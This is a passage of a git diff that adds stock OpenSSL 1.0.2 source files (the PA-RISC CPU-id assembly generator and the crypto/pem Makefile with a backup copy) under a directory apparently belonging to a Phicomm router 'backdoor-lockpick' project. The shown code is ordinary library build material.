+typedef struct ocsp_responder_id_st OCSP_RESPID;
+
+#ifdef  __cplusplus
+}
+#endif
+#endif                          /* def HEADER_OPENSSL_TYPES_H */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pariscid.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pariscid.pl
new file mode 100644
index 0000000..bfc56fd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pariscid.pl
@@ -0,0 +1,225 @@
+#!/usr/bin/env perl
+
+$flavour = shift;
+$output = shift;
+open STDOUT,">$output";
+
+if ($flavour =~ /64/) {
+	$LEVEL		="2.0W";
+	$SIZE_T		=8;
+	$ST		="std";
+} else {
+	$LEVEL		="1.1";
+	$SIZE_T		=4;
+	$ST		="stw";
+}
+
+$rp="%r2";
+$sp="%r30";
+$rv="%r28";
+
+$code=<<___;
+	.LEVEL	$LEVEL
+	.SPACE	\$TEXT\$
+	.SUBSPA	\$CODE\$,QUAD=0,ALIGN=8,ACCESS=0x2C,CODE_ONLY
+
+	.EXPORT	OPENSSL_cpuid_setup,ENTRY
+	.ALIGN	8
+OPENSSL_cpuid_setup
+	.PROC
+	.CALLINFO	NO_CALLS
+	.ENTRY
+	bv	($rp)
+	.EXIT
+	nop
+	.PROCEND
+
+	.EXPORT	OPENSSL_rdtsc,ENTRY
+	.ALIGN	8
+OPENSSL_rdtsc
+	.PROC
+	.CALLINFO	NO_CALLS
+	.ENTRY
+	mfctl	%cr16,$rv
+	bv	($rp)
+	.EXIT
+	nop
+	.PROCEND
+
+	.EXPORT	OPENSSL_wipe_cpu,ENTRY
+	.ALIGN	8
+OPENSSL_wipe_cpu
+	.PROC
+	.CALLINFO	NO_CALLS
+	.ENTRY
+	xor		%r0,%r0,%r1
+	fcpy,dbl	%fr0,%fr4
+	xor		%r0,%r0,%r19
+	fcpy,dbl	%fr0,%fr5
+	xor		%r0,%r0,%r20
+	fcpy,dbl	%fr0,%fr6
+	xor		%r0,%r0,%r21
+	fcpy,dbl	%fr0,%fr7
+	xor		%r0,%r0,%r22
+	fcpy,dbl	%fr0,%fr8
+	xor		%r0,%r0,%r23
+	fcpy,dbl	%fr0,%fr9
+	xor		%r0,%r0,%r24
+	fcpy,dbl	%fr0,%fr10
+	xor		%r0,%r0,%r25
+	fcpy,dbl	%fr0,%fr11
+	xor		%r0,%r0,%r26
+	fcpy,dbl	%fr0,%fr22
+	xor		%r0,%r0,%r29
+	fcpy,dbl	%fr0,%fr23
+	xor		%r0,%r0,%r31
+	fcpy,dbl	%fr0,%fr24
+	fcpy,dbl	%fr0,%fr25
+	fcpy,dbl	%fr0,%fr26
+	fcpy,dbl	%fr0,%fr27
+	fcpy,dbl	%fr0,%fr28
+	fcpy,dbl	%fr0,%fr29
+	fcpy,dbl	%fr0,%fr30
+	fcpy,dbl	%fr0,%fr31
+	bv		($rp)
+	.EXIT
+	ldo		0($sp),$rv
+	.PROCEND
+___
+{
+my $inp="%r26";
+my $len="%r25";
+
+$code.=<<___;
+	.EXPORT	OPENSSL_cleanse,ENTRY,ARGW0=GR,ARGW1=GR
+	.ALIGN	8
+OPENSSL_cleanse
+	.PROC
+	.CALLINFO	NO_CALLS
+	.ENTRY
+	cmpib,*=	0,$len,L\$done
+	nop
+	cmpib,*>>=	15,$len,L\$ittle
+	ldi		$SIZE_T-1,%r1
+
+L\$align
+	and,*<>		$inp,%r1,%r28
+	b,n		L\$aligned
+	stb		%r0,0($inp)
+	ldo		-1($len),$len
+	b		L\$align
+	ldo		1($inp),$inp
+
+L\$aligned
+	andcm		$len,%r1,%r28
+L\$ot
+	$ST		%r0,0($inp)
+	addib,*<>	-$SIZE_T,%r28,L\$ot
+	ldo		$SIZE_T($inp),$inp
+
+	and,*<>		$len,%r1,$len
+	b,n		L\$done
+L\$ittle
+	stb		%r0,0($inp)
+	addib,*<>	-1,$len,L\$ittle
+	ldo		1($inp),$inp
+L\$done
+	bv		($rp)
+	.EXIT
+	nop
+	.PROCEND
+___
+}
+{
+my ($out,$cnt,$max)=("%r26","%r25","%r24");
+my ($tick,$lasttick)=("%r23","%r22");
+my ($diff,$lastdiff)=("%r21","%r20");
+
+$code.=<<___;
+	.EXPORT	OPENSSL_instrument_bus,ENTRY,ARGW0=GR,ARGW1=GR
+	.ALIGN	8
+OPENSSL_instrument_bus
+	.PROC
+	.CALLINFO	NO_CALLS
+	.ENTRY
+	copy		$cnt,$rv
+	mfctl		%cr16,$tick
+	copy		$tick,$lasttick
+	ldi		0,$diff
+
+	fdc		0($out)
+	ldw		0($out),$tick
+	add		$diff,$tick,$tick
+	stw		$tick,0($out)
+L\$oop
+	mfctl		%cr16,$tick
+	sub		$tick,$lasttick,$diff
+	copy		$tick,$lasttick
+
+	fdc		0($out)
+	ldw		0($out),$tick
+	add		$diff,$tick,$tick
+	stw		$tick,0($out)
+
+	addib,<>	-1,$cnt,L\$oop
+	addi		4,$out,$out
+
+	bv		($rp)
+	.EXIT
+	sub		$rv,$cnt,$rv
+	.PROCEND
+
+	.EXPORT	OPENSSL_instrument_bus2,ENTRY,ARGW0=GR,ARGW1=GR
+	.ALIGN	8
+OPENSSL_instrument_bus2
+	.PROC
+	.CALLINFO	NO_CALLS
+	.ENTRY
+	copy		$cnt,$rv
+	sub		%r0,$cnt,$cnt
+
+	mfctl		%cr16,$tick
+	copy		$tick,$lasttick
+	ldi		0,$diff
+
+	fdc		0($out)
+	ldw		0($out),$tick
+	add		$diff,$tick,$tick
+	stw		$tick,0($out)
+
+	mfctl		%cr16,$tick
+	sub		$tick,$lasttick,$diff
+	copy		$tick,$lasttick
+L\$oop2
+	copy		$diff,$lastdiff
+	fdc		0($out)
+	ldw		0($out),$tick
+	add		$diff,$tick,$tick
+	stw		$tick,0($out)
+
+	addib,=		-1,$max,L\$done2
+	nop
+
+	mfctl		%cr16,$tick
+	sub		$tick,$lasttick,$diff
+	copy		$tick,$lasttick
+	cmpclr,<>	$lastdiff,$diff,$tick
+	ldi		1,$tick
+
+	ldi		1,%r1
+	xor		%r1,$tick,$tick
+	addb,<>		$tick,$cnt,L\$oop2
+	shladd,l	$tick,2,$out,$out
+L\$done2
+	bv		($rp)
+	.EXIT
+	add		$rv,$cnt,$rv
+	.PROCEND
+___
+}
+$code =~ s/cmpib,\*/comib,/gm	if ($SIZE_T==4);
+$code =~ s/,\*/,/gm		if ($SIZE_T==4);
+$code =~ s/\bbv\b/bve/gm	if ($SIZE_T==8);
+print $code;
+close STDOUT;
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/Makefile
new file mode 100644
index 0000000..8f118d1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/Makefile
@@ -0,0 +1,240 @@
+#
+# OpenSSL/crypto/pem/Makefile
+#
+
+DIR=	pem
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= pem_sign.c pem_seal.c pem_info.c pem_lib.c pem_all.c pem_err.c \
+	pem_x509.c pem_xaux.c pem_oth.c pem_pk8.c pem_pkey.c pvkfmt.c
+
+LIBOBJ=	pem_sign.o pem_seal.o pem_info.o pem_lib.o pem_all.o pem_err.o \
+	pem_x509.o pem_xaux.o pem_oth.o pem_pk8.o pem_pkey.o pvkfmt.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= pem.h pem2.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links: $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+pem_all.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_all.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_all.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+pem_all.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+pem_all.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pem_all.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pem_all.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pem_all.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_all.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_all.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+pem_all.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pem_all.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pem_all.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pem_all.o: ../cryptlib.h pem_all.c
+pem_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+pem_err.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+pem_err.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pem_err.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pem_err.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pem_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+pem_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+pem_err.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+pem_err.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pem_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pem_err.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pem_err.o: pem_err.c
+pem_info.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_info.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_info.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+pem_info.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pem_info.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pem_info.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pem_info.o: ../../include/openssl/opensslconf.h
+pem_info.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_info.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_info.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+pem_info.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pem_info.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pem_info.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pem_info.o: ../cryptlib.h pem_info.c
+pem_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_lib.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_lib.o: ../../include/openssl/crypto.h ../../include/openssl/des.h
+pem_lib.o: ../../include/openssl/des_old.h ../../include/openssl/e_os2.h
+pem_lib.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pem_lib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pem_lib.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pem_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_lib.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_lib.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+pem_lib.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+pem_lib.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pem_lib.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+pem_lib.o: ../../include/openssl/ui_compat.h ../../include/openssl/x509.h
+pem_lib.o: ../../include/openssl/x509_vfy.h ../asn1/asn1_locl.h ../cryptlib.h
+pem_lib.o: pem_lib.c
+pem_oth.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_oth.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_oth.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pem_oth.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pem_oth.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pem_oth.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pem_oth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_oth.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_oth.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+pem_oth.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pem_oth.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pem_oth.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pem_oth.o: ../cryptlib.h pem_oth.c
+pem_pk8.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_pk8.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_pk8.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pem_pk8.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pem_pk8.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pem_pk8.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pem_pk8.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_pk8.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_pk8.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+pem_pk8.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+pem_pk8.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pem_pk8.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pem_pk8.o: ../../include/openssl/x509_vfy.h ../cryptlib.h pem_pk8.c
+pem_pkey.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_pkey.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_pkey.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+pem_pkey.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pem_pkey.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pem_pkey.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pem_pkey.o: ../../include/openssl/opensslconf.h
+pem_pkey.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_pkey.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_pkey.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+pem_pkey.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+pem_pkey.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pem_pkey.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pem_pkey.o: ../../include/openssl/x509_vfy.h ../asn1/asn1_locl.h ../cryptlib.h
+pem_pkey.o: pem_pkey.c
+pem_seal.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_seal.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_seal.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pem_seal.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pem_seal.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pem_seal.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pem_seal.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_seal.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_seal.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+pem_seal.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+pem_seal.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pem_seal.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pem_seal.o: ../../include/openssl/x509_vfy.h ../cryptlib.h pem_seal.c
+pem_sign.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_sign.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_sign.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pem_sign.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pem_sign.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pem_sign.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pem_sign.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_sign.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_sign.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+pem_sign.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pem_sign.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pem_sign.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pem_sign.o: ../cryptlib.h pem_sign.c
+pem_x509.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_x509.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_x509.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pem_x509.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pem_x509.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pem_x509.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pem_x509.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_x509.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_x509.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pem_x509.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pem_x509.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pem_x509.o: ../../include/openssl/x509_vfy.h ../cryptlib.h pem_x509.c
+pem_xaux.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_xaux.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_xaux.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pem_xaux.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pem_xaux.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pem_xaux.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pem_xaux.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_xaux.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_xaux.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pem_xaux.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pem_xaux.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pem_xaux.o: ../../include/openssl/x509_vfy.h ../cryptlib.h pem_xaux.c
+pvkfmt.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+pvkfmt.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+pvkfmt.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+pvkfmt.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pvkfmt.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pvkfmt.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pvkfmt.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+pvkfmt.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+pvkfmt.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+pvkfmt.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+pvkfmt.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pvkfmt.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pvkfmt.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pvkfmt.o: ../cryptlib.h pvkfmt.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/Makefile.bak
new file mode 100644
index 0000000..8f118d1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/Makefile.bak
@@ -0,0 +1,240 @@
+#
+# OpenSSL/crypto/pem/Makefile
+#
+
+DIR=	pem
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= pem_sign.c pem_seal.c pem_info.c pem_lib.c pem_all.c pem_err.c \
+	pem_x509.c pem_xaux.c pem_oth.c pem_pk8.c pem_pkey.c pvkfmt.c
+
+LIBOBJ=	pem_sign.o pem_seal.o pem_info.o pem_lib.o pem_all.o pem_err.o \
+	pem_x509.o pem_xaux.o pem_oth.o pem_pk8.o pem_pkey.o pvkfmt.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= pem.h pem2.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links: $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+pem_all.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_all.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_all.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+pem_all.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+pem_all.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pem_all.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pem_all.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pem_all.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_all.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_all.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+pem_all.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pem_all.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pem_all.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pem_all.o: ../cryptlib.h pem_all.c
+pem_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+pem_err.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+pem_err.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pem_err.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pem_err.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pem_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+pem_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+pem_err.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+pem_err.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pem_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pem_err.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pem_err.o: pem_err.c
+pem_info.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_info.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_info.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+pem_info.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pem_info.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pem_info.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pem_info.o: ../../include/openssl/opensslconf.h
+pem_info.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_info.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_info.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+pem_info.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pem_info.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pem_info.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pem_info.o: ../cryptlib.h pem_info.c
+pem_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_lib.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_lib.o: ../../include/openssl/crypto.h ../../include/openssl/des.h
+pem_lib.o: ../../include/openssl/des_old.h ../../include/openssl/e_os2.h
+pem_lib.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pem_lib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pem_lib.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pem_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_lib.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_lib.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+pem_lib.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+pem_lib.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pem_lib.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+pem_lib.o: ../../include/openssl/ui_compat.h ../../include/openssl/x509.h
+pem_lib.o: ../../include/openssl/x509_vfy.h ../asn1/asn1_locl.h ../cryptlib.h
+pem_lib.o: pem_lib.c
+pem_oth.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_oth.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_oth.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pem_oth.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pem_oth.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pem_oth.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pem_oth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_oth.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_oth.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+pem_oth.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pem_oth.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pem_oth.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pem_oth.o: ../cryptlib.h pem_oth.c
+pem_pk8.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_pk8.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_pk8.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pem_pk8.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pem_pk8.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
